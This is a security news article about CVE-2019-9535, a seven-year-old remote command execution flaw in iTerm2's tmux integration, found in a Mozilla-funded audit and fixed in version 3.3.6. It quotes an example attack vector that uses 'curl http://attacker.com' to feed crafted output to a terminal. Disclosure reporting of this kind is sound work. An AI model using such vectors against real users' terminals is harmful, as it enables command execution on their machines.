7 Year-old RCE Vulnerability in macOS Terminal Emulator iTerm2 Let Hackers Execute Remote Command in Mac

Mozilla Researchers discovered a critical vulnerability in macOS Terminal Emulator iTerm2 allows attackers to connect with the SSH server to execute a command on the user’s computer.

iTerm2 terminal emulator is a replacement for macOS terminal and the successor of iTerm that supports macOS 10.12 or the newer version with a variety of features including window transparency, full-screen mode, Exposé Tabs, Growl notifications.

The critical vulnerability discovered during the source code security audit conducted by Mozilla researchers and it considers as a very critical security vulnerability that allows an attacker to execute commands on the victim’s machine by sending a specially crafted file.

The security audit conducted under Mozilla Open Source Support Program (MOSS) that continuously focusing to strengthen the open-source ecosystem and ensure its security.

“MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators),” Mozilla said.

The critical vulnerability resides in the tmux integration feature of iTerm2 for the last 7 years and if the attacker can produce the output on the victim’s terminal let attacker possible execute malicious commands on the user’s Mac computer.

According to Mozilla, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative example”.

In order to exploit the vulnerability, attackers need a user interaction which could be achieved by trick users to open a specially crafted file that they send via different mediums such as email or compromised websites.

The Vulnerability can be tracked as CVE-2019-9535 and Mozilla warns that” it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”

The vulnerability has been fixed in version 3.3.6 and all users are strongly recommended to upgrade the new version to avoid future attacks.

You can follow us on LinkedinTwitterFacebook for daily Cyber Security and hacking news updates.

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability

Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ…

16 hours ago

Cybercriminals are Showing Hesitation to Utilize AI When Executing Cyber Attacks

Media reports highlight the sale of LLMs like WormGPT and FraudGPT on underground forums. Fears…

17 hours ago

Vigil: Open-source Security Scanner for LLM Models Like ChatGPT

An open-source security scanner, developed by Git Hub user Adam Swanda, was released to explore…

17 hours ago

Slovenia’s Biggest Power Provider has Suffered a Cyberattack

One of Slovenia's major power providers, HSE, has recently fallen victim to a significant cyberattack.…

17 hours ago

Genesis Market Technique: Hackers Exploited Node.js and EV Certificates

In the labyrinthine landscape of cyber threats, the Trend Micro Managed XDR team has uncovered…

20 hours ago

Design Flaw in Domain-Wide Delegation Could Leave Google Workspace Vulnerable to Takeover – Hunters

BOSTON, MASS. and TEL AVIV, ISRAEL, November 28, 2023 - A severe design flaw in…

2 days ago